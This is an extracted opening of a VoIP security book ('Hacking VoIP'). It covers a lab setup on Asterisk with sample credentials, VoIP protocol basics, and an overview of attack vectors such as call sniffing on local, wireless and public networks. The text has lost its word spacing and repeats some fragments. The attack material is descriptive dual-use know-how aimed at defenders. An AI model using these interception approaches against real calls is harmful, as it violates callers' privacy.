Post on 17-Jul-2020
HackingVoIPProtocols,Attacks,andCountermeasures
HimanshuDwivedi
Editor
WilliamPollock
Copyright©2010Forinformationonbookdistributorsortranslations,pleasecontactNoStarchPress,Inc.directly:NoStarchPress,Inc.555DeHaroStreet,Suite250,SanFrancisco,CA94107phone:415.863.9900;fax:415.863.9950;info@nostarch.com;www.nostarch.comLibraryofCongressCataloging-in-PublicationData:
Dwivedi,Himanshu.HackingVoIP:protocols,attacks,andcountermeasures/HimanshuDwivedi.p.cm.Includesindex.ISBN-13:978-1-59327-163-3ISBN-10:1-59327-163-81.Internettelephony--Securitymeasures.2.Computernetworks--Securitymeasures.I.Title.TK5105.8865.P372009004.69'5--dc222008038559
NoStarchPressandtheNoStarchPresslogoareregisteredtrademarksofNoStarchPress,Inc.Otherproductandcompanynamesmentionedhereinmaybethetrademarksoftheirrespectiveowners.Ratherthanuseatrademarksymbolwitheveryoccurrenceofatrademarkedname,weareusing
witheveryoccurrenceofatrademarkedname,weareusingthenamesonlyinaneditorialfashionandtothebenefitofthetrademarkowner,withnointentionofinfringementofthetrademark.Theinformationinthisbookisdistributedonan"AsIs"basis,withoutwarranty.Whileeveryprecautionhasbeentakeninthepreparationofthiswork,neithertheauthornorNoStarchPress,Inc.shallhaveanyliabilitytoanypersonorentitywithrespecttoanylossordamagecausedorallegedtobecauseddirectlyorindirectlybytheinformationcontainedinit.
DEDICATIONThisbookisFORMYDAD,quitesimplythebesthumanbeingI
haveevermet.Thisbookisdedicatedtomyfamily,specifically:
Mydaughter,SoniaRainaDwivedi,forhersmiles,laughs,persistence,flexibility,inflexibility,vocabulary,andtheability
tomakeeverybodyaroundherhappy.Myson,whosepresencebringsmorehappinesstoeveryone
aroundhim.Mywife,KusumPandey,whosimplymakesitallworthwhile…
andthensome!
ACKNOWLEDGMENTSI'dliketoacknowledgeandthankAdamWright,whosesupportthroughoutthewritingofthisbookwaswellabovethetypicalcallofduty.Thanks,Adam,forhelpingmeoutduringthenon-peaktimes.SpecialthankstoZaneLackeyfortwothings—hisworkontheIAXSecuritychapteraswellashistechnicalreviewoftheentirebook.Thankyou,Zane,forbeingaverydependableandhighlyskilledindividual.
INTRODUCTIONHackingVoIPisasecuritybookwrittenprimarilyforVoIPadministrators.ThebookwillfocusonadministratorsofenterprisenetworksthathavedeployedVoIPandadministratorswhoarethinkingaboutimplementingVoIPontheirnetwork.ThebookassumesreadersarefamiliarwiththebasicsofVoIP,suchassignalingandmediaprotocols,andwilldivestraightintothesecurityexposuresofeachofthem(thereislittleinfoonhowVoIPworks,butratherthesecurityconcernsrelatedtoit).Thebookprimarilyfocusesonenterpriseissues,suchasH.323,anddevoteslessattentiontoissueswithsmallorPC-basedVoIPdeployments.TheprimarygoalofthisbookistoshowadministratorsthesecurityexposuresofVoIPandwaystomitigatethoseexposures.
BookOverviewThisbookwillfocusonthesecurityaspectsofVoIPnetworks,devices,andprotocols.AfterageneraloverviewinChapter1,"AnIntroductiontoVoIPSecurity,"thefirstsection,"VoIPProtocols,"willfocusonthesecurityissuesincommonVoIPprotocols,suchasSIP,H.323,IAX,andRTP.Chapter2,"Signaling:SIPSecurity,"andChapter3,"Signaling:H.323Security,"bothhavesimilarformats;theybrieflydescribehowtheprotocolsworkandthenshowthesecurityissuesrelevanttothem.TheReal-timeTransportProtocolisdiscussedinChapter4,"Media:RTPSecurity."WhilebothSIPandH.323useRTPforthemedialayer,ithasitsownsecurityissuesandvulnerabilities.Chapter4willalsobrieflydiscusshowtheprotocolworksandthencoverthepotentialattacksagainstit.Chapter5,"SignalingandMedia:IAXSecurity,"willcoverIAX;whileitisnotnecessarilyascommonasSIP,H.323,orRTP,IAXisbecomingmorewidespreadbecauseofitsusebyAsterisk,theverypopularopensourceIPPBXsoftware.Additionally,unlikeotherVoIPprotocols,IAXcanhandlebothsessionsetupandmediatransferwithinitselfonasingleport,makingitattractiveformanynewcomerstotheVoIPmarket.Thesecondsectionofthebook,"VoIPSecurityThreats,"focusesonthreedifferentareasthatareaffectedbyweakVoIPprotocols.Thefirstchapterofthissection,Chapter6("AttackingVoIPInfrastructure")willfocusonthesecurityissuesofVoIPdevices.ThechapterwilldiscussthebasicsofsniffingonVoIPnetworks,attacksonhardphones,attacksonpopularVoIPproductsfromCiscoandAvaya,andattacksoninfrastructureVoIPproductssuchasgatekeepers,registrars,andproxies.ThischapterwillshowhowmanyVoIPentitiesaresusceptibletoattackssimilartothosedirectedatanyotherdevicesontheIPnetwork.Chapter7,"UnconventionalVoIPSecurityThreats,"isafunone,asitwillshowsometrickyattacksusingVoIPdevices.WhiletheattacksshowninthischapterarenotspecifictoVoIPitself,itshowshowtousethe
technologytoabuseotherusers/systems.Forexample,CallerIDspoofing,Vishing(VoIPphishing),andtelephonenumberhijackingwiththeuseofVoIP(ratherthanagainstVoIP)areallshowninthischapter.Chapter8,"HomeVoIPSolutions,"discussesthesecurityissuesinhomeVoIPsolutions,suchasVonage,orsimplysoftphonesavailablefromMicrosoft,eBay,Google,andYahoo!.Thefinalsectionofthebook,"AssessandSecureVoIP,"showshowtosecureVoIPnetworks.Chapter9,"SecuringVoIP,"showshowtoprotectagainstmanyoftheattacksdiscussedinthefirsttwosectionsofthebook.Whileit'snotpossibletosecureagainstallattacks,thischapterdoesshowhowtomitigatethem.
Note✎
ForanattackonVoIPtobepossible,onlyonesideoftheconversationneedstobeusingVoIP.Theothersidecanbeanylandline,mobilephone,oranotherVoIPline.
Thesolutionsdiscusstheneedforstrongerauthentication,encryptionsolutions,andnewtechnologytoprotectVoIPsoftclients.Finally,Chapter10,"AuditingVoIPforSecurityBestPractices,"introducesanauditprogramforVoIP.VoIPSecurityAuditProgram(VSAP)providesalonglistoftopics,questions,andsatisfactory/unsatisfactoryscoresfortheenduser.Theprogram'sgoalistoallowVoIPadministratorsandsecurityexpertstoevaluateVoIPdeploymentsintermsofsecurity.Inadditiontoin-depthdiscussionsaboutVoIPsecurityissues,thebookalsocoversmanyfreesecuritytoolscurrentlyavailableontheInternet.ThesetoolscanhelpsupplementthelearningprocessbyallowingreaderstotesttheirownVoIPnetworksandidentifyanysecurityholesand/orweaknesses.Andinadditiontothesecuritytestingtools,step-by-steptestingprocedureshavebeensuppliedaftereverymajorsectionineachchapter.Forexample,inordertofullyunderstandasecuritythreat,practicalapplicationoftheissue
understandasecuritythreat,practicalapplicationoftheissueisoftenveryimportant.Thisbookprovidesstep-by-stepproceduresandlinkstothemostcurrentinformation.Thisapproachshouldensurethatreadershaveeverythingtheyneedtounderstandwhatisbeingpresentedandwhy.Eachchapterhasacommonstructure,whichistointroduceaVoIPtopic,discussthesecurityaspectsofthetopic,discussthetoolsthatcanbeusedwiththetopicandanystep-by-stepprocedurestofullyexplainordemonstratethetopic/tool,andthenexplainthemitigationprocedurestoprotecttheVoIPnetwork.Additionally,variouscharacterstylesthroughoutthebookhavesignificanceforthereader.Filenamesandfilepathswillappearinitalics,andelementsfromtheuserinterfacethatthereaderisinstructedtoclickorchoosewillappearinbold.Excerptsfromcodewillappearinamonospacefont,andinputthatthereaderisinstructedtotypeintotheuserinterfacewillappearinboldmonospace.Placeholdersandvariablesincodewillappearinmonospaceitalic,andplaceholdersthatthereaderneedstofillinwillappearinmonospacebolditalic.
LabSetupSecurityvulnerabilitiesoftengetlostindiscussions,whitepapers,orbookswithoutpracticalexamples.Theabilitytoreadaboutasecurityissueandthenperformaquickexamplesignificantlyaddstotheeducationprocess.Thus,thisbookprovidesstep-by-steptestingproceduresanddemonstrationsformanyofthesecurityissuescovered.InordertoperformadequateVoIPtestingdescribedinthechapters,anon-productionlabenvironmentshouldbecreated.Thissectiondiscussesthespecificlabenvironmentthatwasusedformostoftheattacksdiscussedinthisbook,aswellasconfigurationfilestosetupthedevicesandsoftware.ItshouldbenotedthatreadersarenotexpectedtolicenseexpensivesoftwarefromCiscoandAvaya;thus,onlyfreeorevaluationsoftwarehasbeenusedinalllabs.However,allattacksshowninthebookapplytobothopensourceandcommercialsoftware/devices(Cisco/Avaya)dependingontheVoIPprotocolsthataresupported.Forexample,thesecurityvulnerabilitiesandattacksagainstSIPwillapplyconsistentlytoanydevice,commercialorfree,thatsupportsit.Forthelabsetup,anySIP/IAX/H.323clientcanbeusedwithanySIPRegistrar/Proxy,H.323gatekeeper,andPBXsoftware,includingAsterisk,Cisco,Polycom,orAvaya.Weworkwiththefollowingsoftwarebecauseofeaseofuse,butwedonotmakeanysecurityguaranteeorfunctionalqualitystatementforanyofthem.
SIPclientX-Lite,whichcanbedownloadedfromhttp://www.xten.com/index.php?menu=download/H.323clientEkiga,whichcanbedownloadedfromhttp://www.ekiga.org/,orPowerPlay,whichcanbedownloadedfromhttp://www.bnisolutions.com/products/powerplay/ipcontact.html/IAXclientiaxComm,whichcanbedownloadedfrom
http://iaxclient.sourceforge.net/iaxcomm/SIP/H.323/IAXserver(proxy,registrar,andgatekeeper)AsteriskPBX,whichcanbedownloadedfromhttp://www.asterisk.org/;avirtualimageofAsteriskcanbedownloadedfromhttp://www.vmware.com/vmtn/appliances/directory/302/,andthefreevirtualimageplayercanalsobedownloadedfromhttp://www.vmware.com/download/player/Attacker'sworkstationBackTrackLiveCD(version2),whichcanbedownloadedfromhttp://www.remote-exploit.org/backtrack.html/;thisISOcanalsobeusedwiththevirtualimageplayermentionedpreviously
SIP/IAX/H.323Server
CompletethefollowingstepstoconfiguretheSIP/IAX/H.323server(AsteriskPBX):
1. LoadtheAsteriskPBXbyusingtheAsteriskPBXVirtualMachine(VoIPonCD-appliance)ontheVMwarePlayer.
2. UnzipVoIP-appliance.zipontoyourharddrive.UsingVMwarePlayer,loadVoIPonCD.
3. Backupiax.conf,sip.conf,H.323.conf,andextensions.confontheAsteriskPBXsystem.
4. Backuptheexistingextensions.conffile(cp/etc/asterisk/extensions.conf
/etc/asterisk/extensions.orginal.conf).5. Backuptheexistingsip.conffile(cp/etc/asterisk/sip.conf
/etc/asterisk/sip.orginal.conf).6. BackuptheexistingH.323.conffile(cp
/etc/asterisk/H.323.conf/etc/asterisk/H.323.orginal.conf).7. Backuptheexistingiax.conffile(cp/etc/asterisk/iax.conf
/etc/asterisk/iax.orginal.conf).
8. ConfiguretheAsteriskPBXsystemasfollows:a. Downloadiax.conf,sip.conf,H.323.conf,extensions.conf,and
sip.conffromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/
b. Copyallthreefilesto/etc/asterisk,overwritingtheoriginals.
9. RestarttheAsteriskPBXsystem(/etc/init.d/asteriskrestart).
Done!YounowhaveaworkinglabsetupfortheAsteriskPBX.
SIPSetup
CompletethefollowingstepstoconfiguretheSIPserverandSIPclient:
1. Downloadthepreconfiguredsip.conffilefromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/
2. Copysip.confto/etc/asteriskontheVoIPVMwareappliance.3. StartX-Liteandrightclickinitsmaininterface.4. SelectSIPAccountSettings.5. SelectAddandenterthefollowinginformationforeach
field:a. Username:Soniab. Password:HackmeAmadeusc. Domain:IPaddressoftheAsteriskPBXserverd. ChecktheRegisterwithdomainandreceiveincomingcallsbox
andselecttheTargetDomainradiobutton.6. SelectOKandClose.
Done!YouarenowregisteredtoaSIPserverusingtheSIPclient.
H.323Setup(Ekiga)
CompletethefollowingstepstoconfiguretheH.323client:
1. OpenEkiga(Start►Programs►Ekiga►Ekiga).2. GotoEdit►Accounts►Addandenterthefollowing
information:a. Accountname:H.323LabClientb. Protocol:H.323c. Gatekeeper:IPaddressoftheAsteriskPBXserverd. User:Usernamee. Password:Password
Done!YouarenowregisteredtoanH.323serverusingtheH.323client.
IAXSetup
CompletethefollowingstepstoconfiguretheIAXclient:
1. OpeniaxComm.2. Fromthemenubar,selectOptions►Accounts.3. SelectAddandenterthefollowinginformation:
a. Accountname:anythingb. Host:IPaddressofAsteriskPBXc. Username:Soniad. Password:123voiptest
4. SelectSave.5. SelectDone.
Done!YouarenowregisteredtoanIAXserverusingtheIAXclient.
client.Atthispoint,thelabissetuptoperformalltheattackexerciseslistedineachchapterofthebook.
Chapter1.ANINTRODUCTIONTOVOIPSECURITYFromtheDemocraticParty'sheadquartersintheWatergatecomplexin1972toHewlett-Packard(HP)in2006,attacksontelephoneinfrastructurehavebeenaroundforsometime.WhilethosewhoattackedtheDemocraticPartyandthosewhoattackedHPhaddifferentmotives,theirintentionswereverysimilar:therecordingoftelephoneconversationscontainingsensitiveinformation.TheadventofphonecallsovertheInternet,bywayofVoiceoverIP(VoIP),doesnotchangethemotivesorthetypesofpeopleinvolved(professionalattackers,membersoforganizedcrime,andyourfriendlyneighborhoodteenager).However,itdoesmakesuchattackseasier.ImaginehowhappyPresidentRichardNixon'scampaigncommitteewouldhavebeenifitsoperativeshadhadtheabilitytotaptheDemocraticParty'stelephonesintheWatergatecomplexremotely.OrimaginehowthrilledHPexecutiveswouldhavebeeniftheycouldhavesimplydeployedVoIPinordertosecretlyrecordconversations.Nowimaginehowhappyyourboss,youremployees,yoursonordaughter,yourmotherorfather,organizedcrimeindividuals,yourcubicle-mate,orthatsuspiciouspersonintheconferenceroomontheeighthfloormayfeelwhentheylearnhoweasyitistolistentoyourmostsensitivephonecalls,includingoneswhereyouhavetoprovideyoursocialsecurityorcreditcardnumbertotheotherparty.ForthoseofuswhodonotliketheNationalSecurityAgency(NSA)listeninginonourphonecalls,theproblemsofprivacyandsecurityhavejustgottenworse.TheprimarypurposeofthisbookistoexplainVoIPsecurityfromahackingperspective.We'llcoverattacksonVoIPinfrastructure,protocols,andimplementations,aswellasthemethodstodefendagainsttheknownvulnerabilities.Securityconcernsaside,VoIPisanexcitingnewtechnologythat,asnotedearlier,allowsuserstoplacetelephonecallsover
that,asnotedearlier,allowsuserstoplacetelephonecallsovertheInternet.Ratherthantraditionalphonelines,voicecommunicationusesInternetProtocol(IP)networking.WhilethegeekfactorofusingVoIPiscertainlyappealing,costhasbeenamajordriverformanyVoIPdeployments.Forexample,organizationscansavethousandsofdollarsperyearbyswitchingtoVoIP.SavingmoneybyusingtheInternetinthismannerhasbeenapopulartrendinthepasttwodecades;however,sohastheexploitationoftherelatedsecurityproblems.VoIPreliesonprotocoltraitsthathaveplaguednetworkadministratorsforyears.Theuseofcleartextprotocols,thelackofproperauthentication,andthecomplexityofdeployingstrongend-to-endsecurityarejustafewexamplesofwhyVoIPnetworksaresusceptibletoattack.Thegoalofthisbookistoraiseawareness,describepotentialattacks,andoffersolutionsforVoIPsecurityrisksandexposures.ThischaptercoverssomebasicsonVoIP,layingthegroundworkforbothVoIPexpertsandreaderswhoarelearningaboutVoIPforthefirsttime.Thetopicscoveredinthischapterare:
WhyVoIPVoIPBasicsVoIPSecurityBasicsAttackVectors
WhyVoIPThefollowinglistsummarizeswhyVoIPsecurityisimportant.Similartoanynewertechnologyanditssecurity-relatedaspects,alonglistofargumentsoftenappearsonwhysecurityisnotneeded.Thefollowingisanon-exhaustivelistofwhysecurityisimportanttoVoIP:
Implicitassumptionofprivacy
Mostusersbelievetheirphonecallsarerelativelyprivate,atleastfromtheuserssurroundingthem,butperhapsnot
leastfromtheuserssurroundingthem,butperhapsnotfromtheNSA.Ifyouhaveeverduckedintoaconferenceroomtomakeapersonalorotherwisesensitivephonecall,youexpecttohaveVoIPprivacy.
Theuseofvoicemailpasswords
IfVoIPsecuritydoesnotmatter,thenusershavenoneedtopassword-protecttheirvoicemailaccess.ListeningtoavoicemailsystemusinginsecureVoIPphonesallowsanypersononthelocalsegmenttolistenaswell.
Thesensitivityofvoicecalls
VoIPisoftenusedincallcenters,wherecreditcardnumbers,socialsecuritynumbers,andotherpersonalinformationarefrequentlytransmitted.Ifananonymousattackerisalsolisteningtothecall,thenalltheinformationcanbeconsideredcompromised.
HomeVoIPserviceswithinsecurewireless
HomeVoIPuseisverypopularbecauseofcostreasons,butmanyusersareestablishingtheirconnectionsviainsecurewirelessaccesspoints.InsecurewirelessaccesspointsandinsecureVoIPtechnologycanallowyourneighborsorevensomeonepassingthroughyourneighborhoodtolistentoyourphonecalls.
Compliancewithgovernmentdataprotectionstandards
Organizationshavetolimitthespreadofsensitiveuserinformationacrosstheirdatanetworks;however,thesameideashouldapplytoinformationgoingacrossvoicenetworksusingIP.
VoIPBasicsBeforewedelvetoofarintoVoIP'ssecurityissues,weshoulddiscussthebasicsofthetechnology.Manybuzzwords,protocols,anddevicesareassociatedwithVoIP.InordertofullyunderstandthesecurityimplicationsofalltheprotocolsanddevicesthatmakeupVoIP,wewilldiscussthemajoronesbriefly.
HowItWorks
VoIPusesIPtechnology.InamannersimilartohowyourcomputerusesTCP/IPtotransferpacketswithdata,VoIPtransmitspacketswithaudio.Insteadofthedataprotocols—suchasHTTP,HTTPS,POP3/IMAP,andSMTP—usedinthetransferofdatapackets,VoIPpacketsusevoiceprotocols,suchasSIP(SessionInitiationProtocol),H.323,IAX(Inter-AsteriskeXchangeprotocol),andRTP(Real-timeTransportProtocol).TheheaderintheTCP/IPpacketfordatawillbethesameasforVoIP,includingEthernetframes,sourceIPaddress,destinationIPaddress,MACinformation,andsequencenumbers.Figure1-1showsanexampleofhowVoIPintegrateswiththeOSImodel,whereitemsinboldarecommonVoIPprotocols.
Protocols
TheprimaryprotocolsusedwithVoIPareSIPandH.323atthesessionlayer,whichisusedtosetupaphonecall,andRTPatthemedialayer,whichhandlesthemediaportionofthecall.Hence,SIPandH.323establishacallconnectionandhanditofftoRTP,whichsendsthemediaforthecall.IAXistheoneprotocolthatdoesbothsessionsetupandmedia(i.e.,voice)transfer.
Figure1-1.OSImodelwithVoIP
ThesetupportionforaVoIPcallusuallytakesplacewithafewsupportingservers,suchasSIPProxy/Registrarand/orH.323gatekeeper/gateways.OncethesessionissetupusingSIPorH.323,thecallissenttothemediaprotocol,whichisRTP.Figure1-2showsanexample.
Figure1-2.VoIPprotocolswithsessionandmediatraffic
Note✎
EitherSIPorH.323isusedforsessionsetup,andthenbothofthemuseRTPformedia.SIPandH.323cancoexistinoneenvironment,suchasaSanFranciscoofficeusingSIPandaNewYorkofficeusingH.323,butthesamehandsetusuallywillnotuseSIPandH.323atthesametime.
WhileSIPandH.323performsimilarsetupservices,theygoabouttheminverydifferentways.TheSIPprotocolisdesigned
similartoHTTP,wheremethodssuchasREGISTER,INVITE,FORWARD,LOOKUP,andBYEareusedtosetupacall.H.323usesacollectionofprotocols,suchasH.225,H.245,H.450,H.239,andH.460,toperformthesessionsetup.Also,bothprotocolsusesupportingservers,suchasSIPProxies,SIPRegistrar,H.323gatekeeper,andH.323gateway,betweenthetwoendpointstosetupacall.Whenthecallisfinallysetup,bothprotocolsuseRTPprotocolforthemedialayer,whichtransfersaudiobetweentwoormoreendpoints.IAX,whichisnotaspopularasSIPorH.323,isusedbetweentwoAsteriskservers.UnlikeSIPandH.323,IAXcanbeusedtosetupacallbetweentwoendpointsandusedforthemediachannel.IAXdoesnotuseRTPformediatransferbecausethesupportisbuiltintotheprotocolitself.ThismakesitattractivetoorganizationsthatdesiresimplicityintheirVoIPdeployments.
Deployments
VoIPdeploymentsincludeavarietyofservers,services,andapplicationsthatareusedwithSIP,H.323,IAX,orRTP.Dependingonthedeploymentused,thefollowingtypesofserversareused:EndpointAgenerictermusedforeitherahardphoneorsoftphoneH.323gatekeeperRegistersandauthenticatesH.323endpointsandstoresadatabaseofallregisteredH.323clientsonthenetworkH.323gatewayRoutescallsbetweenH.323gatekeepersHardphonesAphysicaltelephone/handsetusingIPforvoicecommunicationIPPBXAPrivateBranchExchange(PBX)systemthatusesIPforvoicecommunication;usedtoroutetelephonecallsfromoneentitytoanother
SessionBorderControllerHelpsVoIPnetworkscommunicateacrosstrustboundaries(SBCsgenerallyprovideapatharoundfirewalls,notworkwithorthroughthem)SIPProxyProxiescommunicationbetweenSIPUserAgentsandserversSIPRegistrarRegistersandauthenticatesSIPUserAgents(viatheREGISTERmethod);italsostoresadatabaseofallregisteredSIPclientsonthenetworkSoftphonesAsoftwaretelephoneusingIPforvoicecommunicationDependingonthesolutionanorganizationwishestouse,oneormoreofthesetypesofsystemsareused.Figure1-3showsaVoIParchitectureusingSIP/RTP,Figure1-4showsaVoIParchitectureusingH.323/RTP,andFigure1-5showsaVoIParchitectureusingIAX.Inadditiontothesupportingservers,services,andapplications,VoIPtelephonesarealsousedindeployments.VoIPhardphones,whicharephysicalphoneswithanEthernetconnection(RJ-45)ontheback,areoftenused.PopularvendorsofVoIPhardphonesincludeCisco,Avaya,andPolycom.VoIPhardphonesareintendedtosimplyreplaceatraditionallandlinephone.ItshouldbenotedthatadigitalphoneisnotthesameasaVoIPhardphone.Digitalphonesareoftenusedinbusinessenvironmentswhileanalogphonesareoftenusedinhomeenvironments,butneitherareVoIPhardphones.
Figure1-3.VoIPdeploymentswithSIPdevices
Figure1-4.VoIPdeploymentswithH.323devices(RTPthroughfirewalls)
Figure1-5.VoIPdeploymentswithIAXdevices
VoIPsoftphonesaresoftware-basedphonesrunningwithinyourcomputer'soperatingsystem,includingWindows,Unix,Linux,orMacOS.Asimpliedbytheirsoftware-basednature,softphonesdonotphysicallyexist.AsoftphoneusestheIPconnectiononyourcomputertomakeaudiocalls.AgoodexampleofaVoIPsoftphoneisthepopularapplicationSkype.Yahoo!Messenger,GoogleTalk,andMicrosoftLiveMessengerarealsoexamples.ItshouldbenotedthatmosthardphonevendorsalsoprovideasoftphonetobeusedwiththeirsystemsbecausebothtypesofphonesaresimplyusingIPforaudioconnectivity.Additionally,allVoIPequipment,regardlessofwhetheritisasoftphoneorahardphone,cancalleachotheraswellasothertraditionalphonelines,includinglandlinesandmobilephones.SIPhardphones/softphonesareusuallyreferredtoasUserAgents,andH.323hardphones/softphonesareusuallyreferredtoasendpoints.Forspecificdefinitions,refertoBasicVoIPTerminologyfromtheVoIPSAwebsite:http://www.voipsa.org/Activities/VOIPSA_Threat_Taxonomy_0.1.pdf/
VoIPSecurityBasicsNowthatwehavethebasicsofVoIPcovered,let'sgooversomesecuritybasics.Nomatterwhattopicisbeingaddressed,fromstoragetowebapplicationsecurity,themaincomponentsofsecurity,includingauthentication,authorization,availability,confidentiality,andintegrityprotection,willalwaysneedtobediscussed.
Authentication
TheauthenticationprocessinmostVoIPdeploymentoccursatthesessionlayer.Whenanendpointconnectstothenetworkorplacesaphonecall,authenticationtakesplacebetweentheVoIPphoneandsupportservers,suchasSIPRegistrars,H.323gateways,orIAXAsteriskservers.Mediaprotocols,suchasRTPorthemediaportionofIAX,donotrequireauthenticationbecauseitalreadyoccursatthesessionsetupportionofacall.Whiletheuseofauthenticationisalwaysagoodthing,theuseofinsecureorpoorauthenticationmechanismsisnot.Unfortunately,SIP,H.323,andIAXalluseweakauthenticationmechanisms,whicharediscussedinChaptersChapter2,Chapter3,andChapter4.Themostcommondefaultauthenticationtypesforeachsignalingprotocolare:SIPDigestauthenticationH.323MD5hashofgeneralID(username),password,andtimestampIAXMD5hashofpasswordandthechallengeWhentwophonesarecallingeachother,theyauthenticatenottoeachotherbuttointermediatesupportservers.Figure1-6showsanexampleauthenticationprocessatahighlevel.
Figure1-6.Authenticationprocessatahighlevel
Authorization
AuthorizationonVoIPcansometimesbeusedforsecuritypurposes.Forexample,limitingcertainVoIPendpoints'abilitytodialspecificphonenumbersmaybedesirable.PermittingonlycertaindevicestojointheVoIPnetworkalsomayhelpprotectVoIPnetworks.ItshouldbenotedthatauthorizationvaluesarerarelyusedinenterpriseVoIPdeploymentsandareeasytobypass.Nonetheless,thefollowinglistshowswhatentitiescanbeusedforauthorizationparameters:E.164aliasEachH.323endpointcontainsanE.164alias.TheE.164aliasisaninternationalnumbersystemthatcomprisesacountrycode(CC),anationaldestinationcode(NDC),andasubscribernumber(SN).AnE.164aliascanhaveupto15alphanumericvaluesandcanbeseteitherdynamicallybyagatekeeperdeviceorlocallybytheendpointitself.MACMachineAccessControladdressesareoneveryEthernet-enabled(Layer2intheOSImodel)device.TheseaddressesaresometimesusedtoauthorizecertaindevicesonVoIPnetworks.URISIPreallydoesnothaveanauthorizationvalue,buttheUniformResourceIdentifier(URI)isavaluethateachSIPUserAgentcontains.Thevaluecanbeusedtoauthorizeendpoints.SimilartoSIP,IAXdoesnothaveanauthorizationvalue,buttheURIcanalsobeused.
Availability
VoIPnetworksneedtobeupandrunningmostofthetime,ifnotallofthetime.UnlikewithotherIT-managedservices,suchasemail,calendaring,orevenInternetaccess,usershavegrowntorelyontelephones100percentofthetime.Usually,userscantoleratehourswhen"thenetworkisdown,"buttheywillnotbeverypatientwhentheyhear"thetelephonescannotbeusedbecauseofaDenialofServiceattack."HavingtheabilitytomakereliabletelephonecallsisalmostamandateforVoIP.ThemethodsusedtoensuretheVoIPnetworkremainavailableareshowninthefollowinglist.QoSQualityofServiceisusedwithVoIP.QoScontainsqualityrequirementsforcertaintypesofpacketsandservices.Inmanysituations,audiopacketsaregivenpriorityoverdatapacketsusingQoS.SeparatingdatanetworksandvoicenetworksVoicenetworksareoftenplacedonaseparatenetworkand/orVLAN,isolatingthemfromdatapackets.WhiletheInternetisnotaseriesoftubesthatcouldgetcloggedup,separatingthevoicenetworkscanisolatethemfromissuesthatappearondatanetworks,suchasanunresponsiveswitch/router.
Encryption
TheencryptionofVoIPtrafficcanoccuratmultipleplaces,includingsignalingormedialayers.Becauseauthenticationoccursatthesignalinglayerandtheaudiopacketsareusedatthemedialayer,encryptingVoIPtrafficintwodifferentsegmentsisoftenrequired.Forexample,protectingthesignalingbutnottheaudioleavestheactualcommunicationunprotected;however,protectingthemediaandnotthesignalinglayerleavestheauthenticationinformationunprotected.Inallsituations,thefollowingitemscanbeusedtoencryptVoIPnetworks:
IPSecPointtoPointIPSecgatewayscanbeusedtoprotectVoIPtrafficoverpublicoruntrustednetworks,suchastheInternet.ItshouldbenotedthatIPSecisoftennotusedbetweenendpointsbecauseofthelimitedsupportforanIPSecclientonVoIPclients.SRTPSecureRealTimeTransferProtocolcanbeusedwithAdvancedEncryptionStandard(AES)toprotectthemedialayerduringVoIPcalls.
Note✎
ItshouldbenotedthatifSRTPisused,inmanycasesthekeygoesacrossthenetworkincleartextonthesessionsetupprotocol(SIPorH.323).HenceitisimportanttoalsouseSSLwiththesessionsetupprotocoltoleveragethefulladvantagesofSRTP.
SSLVoIPprotocolscannativelybewrappedwithSSL(SIPS)orwithStunnel(H.323)toprotectsignalingprotocols.
AttackVectorsAlltechnologyhasasecurityissue,fromelectronicvotingmachinestoVoIP.Oneoftheitemsthatoftenconfusesorinappropriatelydiffusesmattersistheperceiveddifficultyinvolvedinlaunchingandcarryingoutanattack.Thetruthisthatwithsufficientmotivation,includingpossiblewealth,fame,orvengeance,anysecurityissuecanbeexposedandexploited.VoIPattackvectorsaresimilartotraditionalvectorsinnetworkingequipment.Forexample,thereisnoneedtohavephysicalaccesstoaphoneortothePBXcloset.TheaccessneededtoperformVoIPattacksdependonthetypeofVoIPdeployment.ThemostpopularattackvectorsforVoIPnetworksareshowninthefollowinglist.Alocalsubnet,suchasaninternalnetwork,whereVoIPisusedByunpluggingand/orsharingaVoIPhardphone'sEthernetconnection(usuallysittingonone'sdesk),anattackercanconnecttothevoicenetwork.(SeeSectionAinFigure1-7.)Alocalnetworkthatisusingwirelesstechnologywithuntrustedusers,suchasacoffeeshop,hotelroom,orconferencecenterAnattackercansimplyconnecttothewirelessnetwork,reroutetraffic,andcaptureVoIPcalls.(SeeSectionBinFigure1-7.)Apublicornontrustednetwork,suchastheInternet,whereVoIPcommunicationisusedAnattackerwhohasaccesstoapublicnetworkcansimplysniffthecommunicationandcapturetelephonecalls.(SeeSectionCinFigure1-7.)
Figure1-7.VoIPattackvectors
SummaryVoIPisanexcitingemergingtechnology.WhileVoIPhasbeenaroundforyears,organizationsandhomeusershaveonlyrecentlybeguntoadoptit.Aswithanynewtrend,thesecurityimpactonprivateandsensitiveinformationneedstobeaddressed.Thegoodnewsisthatwhendonecorrectly,VoIPcanbesecure.However,similartoanytechnologythattransportsconfidentialinformation,securitytestingandevaluationneedstobeperformedtoproperlyshowthepotentialrisktoanorganization.Thisbookisanattempttostartthediscussionforvulnerabilitydetection,byshowingthesecurityweaknessesandcountermeasuresformostcurrentVoIPdeployments.
PartI.VOIPPROTOCOLS
Chapter2.SIGNALING:SIPSECURITYSIP(SessionInitiationProtocol)isaverycommonVoIPsignalingprotocol.ItoftendominatesthediscussionofVoIPsecurity;however,justliketheYankeesandtheRedSox,itgetsmoreattentionthanitactuallydeserves.H.323isprobablythemorecommonsignalingprotocolinenterpriseenvironments;however,becauseH.323isverycomplexandnoteasytoacquire,itisoftenovershadowedbySIP.(SeeChapter3formoreonH.323security.)ThischapterisdedicatedtoSIPbasicsandsecurityattacks,includingauthentication,hijacking,andDenialofService.We'llalsofocusonsecurityattacksagainstVoIPinfrastructure,specificallySIPUserAgents,Registrars,Redirectservers,andProxyservers.FormoreinformationonSIP,refertoRFC3261(http://www.ietf.org/rfc/rfc3261.txt?number=3261/).
Note✎
SIPsecurityissuesarenotuniquetoanyonevendororonetypeofdeployment.AnydevicethatsupportsSIPforsessioninitiation,bothforhardorsoftphones,issubjecttotheseissues.
Intermsofdeployment,SIPcanbeusedoneithersoftphonesorhardphones.AsnotedinChapter1,asoftphoneisasoftware-basedphonerunningonaPCorMac,suchasSkype,GoogleTalk,orAvaya/Cisco.SoftphonesusuallyrequireasoftwareclientandsometypeofInternetconnection.Ahardphoneisaphysicaldevicethatlookssimilartotheexistinganalogphonesinmanyhomes.Unlikeananalogphone,however,aVoIPhardphonehasanEthernetconnectionratherthanatypicaltelephonejack(RJ-45insteadofRJ-11).
Note✎
SIPisthesessionsetupprotocoloftenusedwithsoftphones;however,itisalsogainingpopularityinhardphonedevices.
